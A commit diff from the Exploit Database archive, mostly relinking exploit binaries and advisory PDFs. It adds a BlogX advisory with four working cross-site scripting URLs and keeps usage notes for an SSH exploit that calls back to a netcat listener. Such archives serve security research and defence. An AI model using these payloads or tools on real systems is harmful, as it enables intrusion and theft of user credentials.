pythonmaster41
diff --git a/‎files.csv‎
Lines changed: 229 additions & 213 deletions b/‎files.csv‎
Lines changed: 229 additions & 213 deletions
diff --git a/‎platforms/android/local/9477.txt‎
Lines changed: 1 addition & 1 deletion b/‎platforms/android/local/9477.txt‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎platforms/asp/remote/15213.pl‎
Lines changed: 1 addition & 1 deletion b/‎platforms/asp/remote/15213.pl‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎platforms/asp/webapps/37015.txt‎
Lines changed: 13 additions & 0 deletions b/‎platforms/asp/webapps/37015.txt‎
Lines changed: 13 additions & 0 deletions
diff --git a/‎platforms/asp/webapps/8719.py‎
Lines changed: 1 addition & 1 deletion b/‎platforms/asp/webapps/8719.py‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎platforms/freebsd/local/12090.txt‎
Lines changed: 1 addition & 1 deletion b/‎platforms/freebsd/local/12090.txt‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎platforms/freebsd/local/12091.txt‎
Lines changed: 1 addition & 1 deletion b/‎platforms/freebsd/local/12091.txt‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎platforms/freebsd/remote/17462.txt‎
Lines changed: 1 addition & 1 deletion b/‎platforms/freebsd/remote/17462.txt‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎platforms/freebsd/remote/18181.txt‎
Lines changed: 1 addition & 1 deletion b/‎platforms/freebsd/remote/18181.txt‎
Lines changed: 1 addition & 1 deletion
diff --git a/‎platforms/freebsd/webapps/12658.txt‎
Lines changed: 1 addition & 1 deletion b/‎platforms/freebsd/webapps/12658.txt‎
Lines changed: 1 addition & 1 deletion
@@ -1,6 +1,6 @@
 Source for exploiting CVE-2009-2692 on Android; Hole is closed in Android kernels released August 2009 or later.
 
 orig: http://zenthought.org/content/file/android-root-2009-08-16-source
-back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/android-root-20090816.tar.gz
+back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9477.tar.gz (android-root-20090816.tar.gz)
 
 # milw0rm.com [2009-08-18]
@@ -10,7 +10,7 @@
 #  Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2. 
 #  A similar exploitation vector was also added lately in Padbuster v0.3: 
 #  http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/
-#  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/padBuster.pl
+#  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15213.pl (padBuster.pl)
 #
 #
 #  Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)
 
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/52730/info
+
+Matthew1471 BlogX is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/About.asp?ShowOriginal="><SCRIPT>alert("demonalex");</SCRIPT>&ShowNew=a&ShowChanges=b
+
+http://www.example.com/About.asp?ShowOriginal=Y&ShowNew="><SCRIPT>alert("demonalex");</SCRIPT>&ShowChanges=b
+
+http://www.example.com/About.asp?ShowOriginal=Y&ShowNew=a&ShowChanges="><SCRIPT>alert("demonalex");</SCRIPT>
+
+http://www.example.com/Search.asp?Search=</title><SCRIPT>alert("demonalex");</SCRIPT>&Page=0
@@ -15,7 +15,7 @@
 
 # for working  with this exploit you need two asp file for updating hash you can download both from : 
 # www.abysssec.com/files/dana.zip
-# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-dana.zip
+# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8719.zip (2009-dana.zip)
 
 # then need to upload asp files and change  this "http://wwww.yourasphost.com/salt.asp?salt="  in exploit code
 
 
@@ -15,4 +15,4 @@ Ironmail was found to allow any CLI user to run arbitrary commands with Admin ri
 improper handling of environment variables.
 
 Download:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0404.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12090.pdf (cybsec_advisory_2010_0404.pdf)
@@ -14,4 +14,4 @@ Vulnerability Description:
 Some files that allow to obtain usernames and other internal information can be read by any user inside
 the CLI.
 
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0403.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12091.pdf (cybsec_advisory_2010_0403.pdf)
@@ -196,7 +196,7 @@ Kingcope
 A statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2.
 
 the statically linked binary can be downloaded from http://isowarez.de/ssh_0day
-Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ssh_0day.tar.gz
+Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17462.tar.gz (ssh_0day.tar.gz)
 
 run like ./ssh -1 -z <yourip> <target>
 setup a netcat, port 443 on yourip first
@@ -33,5 +33,5 @@ BTW my box (isowarez.de) got hacked so expect me in a zine :>
 /Signed "the awesome" Kingcope
 
 Code:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7350roaringbeastv3.tar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18181.tar (7350roaringbeastv3.tar)
 
@@ -15,4 +15,4 @@ improper profile check.
 ===========
 Download:
 ===========
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12658.pdf (cybsec_advisory_2010_0501_Ironmail_Advisory_Web_Access_Broken_Access.pdf)
Original file line number	Diff line number	Diff line change
`@@ -10,7 +10,7 @@`
`10`	`10`	`# Note from Exploit-db: This very first exploit was meant to work with Padbusterdornet or Padbuster v0.2.`
`11`	`11`	`# A similar exploitation vector was also added lately in Padbuster v0.3:`
`12`	`12`	`# http://www.gdssecurity.com/l/b/2010/10/04/padbuster-v0-3-and-the-net-padding-oracle-attack/`
`13`		`-# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/padBuster.pl`
	`13`	`+# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15213.pl (padBuster.pl)`
`14`	`14`	`#`
`15`	`15`	`#`
`16`	`16`	`# Giorgio Fedon - (giorgio.fedon@mindedsecurity.com)`